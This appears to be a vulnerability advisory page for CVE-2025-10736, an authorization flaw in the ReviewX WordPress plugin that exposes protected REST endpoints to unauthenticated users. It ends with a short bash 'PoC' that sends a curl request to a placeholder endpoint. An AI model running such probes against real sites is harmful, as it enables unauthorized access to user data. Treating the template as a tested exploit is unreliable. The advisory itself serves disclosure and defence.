Security Vulnerability Report
CVE-2025-10736 CVSS 6.5 MEDIUM

CVE-2025-10736

Published: 2026-03-23 05:16:05
Last Modified: 2026-04-24 16:32:54

Description

The ReviewX – WooCommerce Product Reviews with Multi-Criteria, Reminder Emails, Google Reviews, Schema & More plugin for WordPress is vulnerable to unauthorized access of data due to improper authorization checks on the userAccessibility() function in all versions up to, and including, 2.2.10. This makes it possible for unauthenticated attackers to access protected REST API endpoints and to extract and modify information related to users and the plugin's configuration.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)


ReviewX <= 2.2.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# CVE-2025-10736 PoC - Unauthorized Access to ReviewX API
# Usage: ./poc.sh <target_url>

TARGET="$1"
if [ -z "$TARGET" ]; then
    echo "Usage: $0 <target_url>"
    exit 1
fi

echo "[+] Attempting to access protected endpoint..."
# Example endpoint to extract user data or config
curl -s -X GET "$TARGET/wp-json/reviewx/v1/some-protected-endpoint" \
    -H "User-Agent: CVE-2025-10736-Scanner" \
    -H "Accept: application/json"
# printf is used because plain echo does not interpret "\n"
printf '\n[+] Done.\n'

References

Weakness: CWE-285 (Improper Authorization)

Plugin source (AuthMiddleware.php in ReviewX 2.2.7, WordPress plugins Trac):
https://plugins.trac.wordpress.org/browser/reviewx/2.2.7/app/Rest/Middleware/AuthMiddleware.php#L41

Wordfence advisory:
https://www.wordfence.com/threat-intel/vulnerabilities/id/505d7072-8fca-4b86-9b9c-3f39bc4dcfaf?source=cve